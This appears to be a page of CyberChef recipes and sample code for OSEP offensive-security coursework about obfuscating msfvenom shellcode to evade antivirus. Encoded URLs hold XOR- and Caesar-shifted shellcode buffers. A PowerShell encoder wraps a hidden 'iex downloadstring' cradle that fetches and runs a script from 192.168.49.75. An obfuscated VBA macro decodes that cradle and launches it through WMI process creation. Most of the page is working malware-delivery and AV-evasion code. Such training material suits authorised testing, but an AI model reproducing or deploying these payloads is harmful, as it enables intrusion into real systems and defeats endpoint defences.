Some handy recipes for OSEP exercises to help generate shellcodes with that are obfuscated to help bypass AV's. Follow the link and copy paste your own msfvenom output in the box and get an encoded/encrypted variant back in the output box. It's that simple! You do have to write the proper decoding/decrypting code though.
cmd: msfvenom -p <payload> -f csharp
Ceasar Cipher obfuscation: Modify the ADD module to your Ceasar ADD or replace with SUB if you want to do minus.
https://gchq.github.io/CyberChef/#recipe=Find_/_Replace(%7B'option':'Regex','string':'%5Ebyte%5C%5C%5B%5C%5C%5D%20buf%20%3D%20new%20byte%5C%5C%5B%5C%5Cd%2B%5C%5C%5D'%7D,'',true,false,true,false)From_Hex('Auto')ADD(%7B'option':'Hex','string':'9'%7D)To_Hex('0x%20with%20comma',15)Find_/_Replace(%7B'option':'Regex','string':'$'%7D,'%20%7D;',true,false,false,false)&input=Ynl0ZVtdIGJ1ZiA9IG5ldyBieXRlWzEzMF0gewoweDQ4LDB4MzEsMHhmZiwweDZhLDB4MDksMHg1OCwweDk5LDB4YjYsMHgxMCwweDQ4LDB4ODksMHhkNiwweDRkLDB4MzEsMHhjOSwKMHg2YSwweDIyLDB4NDEsMHg1YSwweGIyLDB4MDcsMHgwZiwweDA1LDB4NDgsMHg4NSwweGMwLDB4NzgsMHg1MSwweDZhLDB4MGEsCjB4NDEsMHg1OSwweDUwLDB4NmEsMHgyOSwweDU4LDB4OTksMHg2YSwweDAyLDB4NWYsMHg2YSwweDAxLDB4NWUsMHgwZiwweDA1LAoweDQ4LDB4ODUsMHhjMCwweDc4LDB4M2IsMHg0OCwweDk3LDB4NDgsMHhiOSwweDAyLDB4MDAsMHgwMSwweGJiLDB4YzAsMHhhOCwKMHgzMSwweDVhLDB4NTEsMHg0OCwweDg5LDB4ZTYsMHg2YSwweDEwLDB4NWEsMHg2YSwweDJhLDB4NTgsMHgwZiwweDA1LDB4NTksCjB4NDgsMHg4NSwweGMwLDB4NzksMHgyNSwweDQ5LDB4ZmYsMHhjOSwweDc0LDB4MTgsMHg1NywweDZhLDB4MjMsMHg1OCwweDZhLAoweDAwLDB4NmEsMHgwNSwweDQ4LDB4ODksMHhlNywweDQ4LDB4MzEsMHhmNiwweDBmLDB4MDUsMHg1OSwweDU5LDB4NWYsMHg0OCwKMHg4NSwweGMwLDB4NzksMHhjNywweDZhLDB4M2MsMHg1OCwweDZhLDB4MDEsMHg1ZiwweDBmLDB4MDUsMHg1ZSwweDZhLDB4N2UsCjB4NWEsMHgwZiwweDA1LDB4NDgsMHg4NSwweGMwLDB4NzgsMHhlZCwweGZmLDB4ZTYgfTs
https://gchq.github.io/CyberChef/#recipe=Find_/_Replace(%7B'option':'Regex','string':'%5Ebyte%5C%5C%5B%5C%5C%5D%20buf%20%3D%20new%20byte%5C%5C%5B%5C%5Cd%2B%5C%5C%5D'%7D,'',true,false,true,false)From_Hex('Auto')XOR(%7B'option':'Hex','string':'4c'%7D,'Standard',false)To_Hex('0x%20with%20comma',15)Find_/_Replace(%7B'option':'Regex','string':'$'%7D,'%20%7D;',true,false,false,false)&input=Ynl0ZVtdIGJ1ZiA9IG5ldyBieXRlWzEzMF0gewoweDQ4LDB4MzEsMHhmZiwweDZhLDB4MDksMHg1OCwweDk5LDB4YjYsMHgxMCwweDQ4LDB4ODksMHhkNiwweDRkLDB4MzEsMHhjOSwKMHg2YSwweDIyLDB4NDEsMHg1YSwweGIyLDB4MDcsMHgwZiwweDA1LDB4NDgsMHg4NSwweGMwLDB4NzgsMHg1MSwweDZhLDB4MGEsCjB4NDEsMHg1OSwweDUwLDB4NmEsMHgyOSwweDU4LDB4OTksMHg2YSwweDAyLDB4NWYsMHg2YSwweDAxLDB4NWUsMHgwZiwweDA1LAoweDQ4LDB4ODUsMHhjMCwweDc4LDB4M2IsMHg0OCwweDk3LDB4NDgsMHhiOSwweDAyLDB4MDAsMHgwMSwweGJiLDB4YzAsMHhhOCwKMHgzMSwweDVhLDB4NTEsMHg0OCwweDg5LDB4ZTYsMHg2YSwweDEwLDB4NWEsMHg2YSwweDJhLDB4NTgsMHgwZiwweDA1LDB4NTksCjB4NDgsMHg4NSwweGMwLDB4NzksMHgyNSwweDQ5LDB4ZmYsMHhjOSwweDc0LDB4MTgsMHg1NywweDZhLDB4MjMsMHg1OCwweDZhLAoweDAwLDB4NmEsMHgwNSwweDQ4LDB4ODksMHhlNywweDQ4LDB4MzEsMHhmNiwweDBmLDB4MDUsMHg1OSwweDU5LDB4NWYsMHg0OCwKMHg4NSwweGMwLDB4NzksMHhjNywweDZhLDB4M2MsMHg1OCwweDZhLDB4MDEsMHg1ZiwweDBmLDB4MDUsMHg1ZSwweDZhLDB4N2UsCjB4NWEsMHgwZiwweDA1LDB4NDgsMHg4NSwweGMwLDB4NzgsMHhlZCwweGZmLDB4ZTYgfTs
cmd: msfvenom -p <payload> -f c
Runner: https://github.com/TheWorkingDeveloper/OSEP-CyberChef-Recipes/blob/main/C-XOR-Runner.c
Based on chapter 10.2.2 of OSEP
https://gchq.github.io/CyberChef/#recipe=Find_/_Replace(%7B'option':'Regex','string':'(unsigned%20char%20buf%5C%5C%5B%5C%5C%5D%20%3D%20?%5C%5Cn%7C%5B%22;%5C%5C%5C%5Cx%5C%5Cn%5D)'%7D,'',true,false,true,false)From_Hex('Auto')XOR(%7B'option':'UTF8','string':'m'%7D,'Standard',false)To_Hex('%5C%5Cx',15)Find_/_Replace(%7B'option':'Regex','string':'(%5E%7C$)'%7D,'%22',true,false,true,false)Find_/_Replace(%7B'option':'Regex','string':'%5E%22'%7D,'unsigned%20char%20buf%5B%5D%20%3D%20%5C%5Cn%22',true,false,false,false)Find_/_Replace(%7B'option':'Regex','string':'$'%7D,';',true,false,false,false)&input=dW5zaWduZWQgY2hhciBidWZbXSA9IAoiXHg2YVx4MzlceDU4XHgwZlx4MDVceDQ4XHg4NVx4YzBceDc0XHgwOFx4NDhceDMxXHhmZlx4NmFceDNjIgoiXHg1OFx4MGZceDA1XHg2YVx4MzlceDU4XHgwZlx4MDVceDQ4XHg4NVx4YzBceDc0XHgwOFx4NDhceDMxIgoiXHhmZlx4NmFceDNjXHg1OFx4MGZceDA1XHg0OFx4MzFceGZmXHg2YVx4MDlceDU4XHg5OVx4YjZceDEwIgoiXHg0OFx4ODlceGQ2XHg0ZFx4MzFceGM5XHg2YVx4MjJceDQxXHg1YVx4YjJceDA3XHgwZlx4MDVceDQ4IgoiXHg4NVx4YzBceDc4XHg1MVx4NmFceDBhXHg0MVx4NTlceDUwXHg2YVx4MjlceDU4XHg5OVx4NmFceDAyIgoiXHg1Zlx4NmFceDAxXHg1ZVx4MGZceDA1XHg0OFx4ODVceGMwXHg3OFx4M2JceDQ4XHg5N1x4NDhceGI5IgoiXHgwMlx4MDBceDA1XHgzOVx4YzBceGE4XHg3Nlx4MDNceDUxXHg0OFx4ODlceGU2XHg2YVx4MTBceDVhIgoiXHg2YVx4MmFceDU4XHgwZlx4MDVceDU5XHg0OFx4ODVceGMwXHg3OVx4MjVceDQ5XHhmZlx4YzlceDc0IgoiXHgxOFx4NTdceDZhXHgyM1x4NThceDZhXHgwMFx4NmFceDA1XHg0OFx4ODlceGU3XHg0OFx4MzFceGY2IgoiXHgwZlx4MDVceDU5XHg1OVx4NWZceDQ4XHg4NVx4YzBceDc5XHhjN1x4NmFceDNjXHg1OFx4NmFceDAxIgoiXHg1Zlx4MGZceDA1XHg1ZVx4NmFceDdlXHg1YVx4MGZceDA1XHg0OFx4ODVceGMwXHg3OFx4ZWRceGZmIgoiXHhlNiI7
Encoder example:
$payload = "powershell -exec bypass -nop -w hidden -c iex((new-object system.net.webclient).downloadstring('http://192.168.49.75/6.8.1-v1.ps1'))"
[string]$output = ""
$payload.ToCharArray() | %{
[string]$thischar = [byte][char]$_ + 19
if($thischar.Length -eq 1)
{
$thischar = [string]"00" + $thischar
$output += $thischar
}
elseif($thischar.Length -eq 2)
{
$thischar = [string]"0" + $thischar
$output += $thischar
}
elseif($thischar.Length -eq 3)
{
$output += $thischar
}
}
$output
Encoder:
https://gchq.github.io/CyberChef/#recipe=Decode_text('UTF-8%20(65001)')ADD(%7B'option':'Decimal','string':'19'%7D)To_Decimal('Space',false)Find_/_Replace(%7B'option':'Regex','string':'%5E%7C$%7C%20'%7D,'%20%20',true,false,true,true)Find_/_Replace(%7B'option':'Regex','string':'%20(%5C%5Cd%7B1%7D)%20'%7D,'%2000$1%20',true,false,true,false)Find_/_Replace(%7B'option':'Regex','string':'%20(%5C%5Cd%7B2%7D)%20'%7D,'%200$1%20',true,false,true,false)Find_/_Replace(%7B'option':'Regex','string':'%20'%7D,'',true,false,true,false)&input=cG93ZXJzaGVsbCAtZXhlYyBieXBhc3MgLW5vcCAtdyBoaWRkZW4gLWMgaWV4KChuZXctb2JqZWN0IHN5c3RlbS5uZXQud2ViY2xpZW50KS5kb3dubG9hZHN0cmluZygnaHR0cDovLzE5Mi4xNjguNDkuNzUvNi44LjEtdjEucHMxJykp
Example decoder:
Function Pomomon(Boomon)
Pomomon = Chr(Boomon - 19)
End Function
Function Strawberries(Boyyolr)
Strawberries = Left(Boyyolr, 3)
End Function
Function Hhonowno(Oemondcvz)
Hhonowno = Right(Oemondcvz, Len(Oemondcvz) - 3)
End Function
Function Qeerere(Nodfmniw)
Do
Nonropowokwemon = Nonropowokwemon + Pomomon(Strawberries(Nodfmniw))
Nodfmniw = Hhonowno(Nodfmniw)
Loop While Len(Nodfmniw) > 0
Qeerere = Nonropowokwemon
End Function
Function MyMacro()
Dim Nocvbdd As String
Dim Mohzqdd As String
Nocvbdd = "131130138120133134123120127127051064120139120118051117140131116134134051064129130131051064138051123124119119120129051064118051124120139059059129120138064130117125120118135051134140134135120128065129120135065138120117118127124120129135060065119130138129127130116119134135133124129122059058123135135131077066066068076069065068073075065071076065074072066073065075065068064137068065131134068058060060"
Mohzqdd = Qeerere(Nocvbdd)
GetObject(Qeerere("138124129128122128135134077")).Get(Qeerere("106124129070069114099133130118120134134")).Create Mohzqdd, Omfodn, Monono, Nappoor
End Function
Decoder: https://gchq.github.io/CyberChef/#recipe=Find_/_Replace(%7B'option':'Regex','string':'(.%7B3%7D)'%7D,'$1%20',true,false,true,true)Find_/_Replace(%7B'option':'Regex','string':'%200%2B'%7D,'%20',true,false,true,false)From_Decimal('Space',false)SUB(%7B'option':'Decimal','string':'19'%7D)&input=MTMxMTMwMTM4MTIwMTMzMTM0MTIzMTIwMTI3MTI3MDUxMDY0MTIwMTM5MTIwMTE4MDUxMTE3MTQwMTMxMTE2MTM0MTM0MDUxMDY0MTI5MTMwMTMxMDUxMDY0MTM4MDUxMTIzMTI0MTE5MTE5MTIwMTI5MDUxMDY0MTE4MDUxMTI0MTIwMTM5MDU5MDU5MTI5MTIwMTM4MDY0MTMwMTE3MTI1MTIwMTE4MTM1MDUxMTM0MTQwMTM0MTM1MTIwMTI4MDY1MTI5MTIwMTM1MDY1MTM4MTIwMTE3MTE4MTI3MTI0MTIwMTI5MTM1MDYwMDY1MTE5MTMwMTM4MTI5MTI3MTMwMTE2MTE5MTM0MTM1MTMzMTI0MTI5MTIyMDU5MDU4MTIzMTM1MTM1MTMxMDc3MDY2MDY2MDY4MDc2MDY5MDY1MDY4MDczMDc1MDY1MDcxMDc2MDY1MDc0MDcyMDY2MDczMDY1MDc1MDY1MDY4MDY0MTM3MDY4MDY1MTMxMTM0MDY4MDU4MDYwMDYw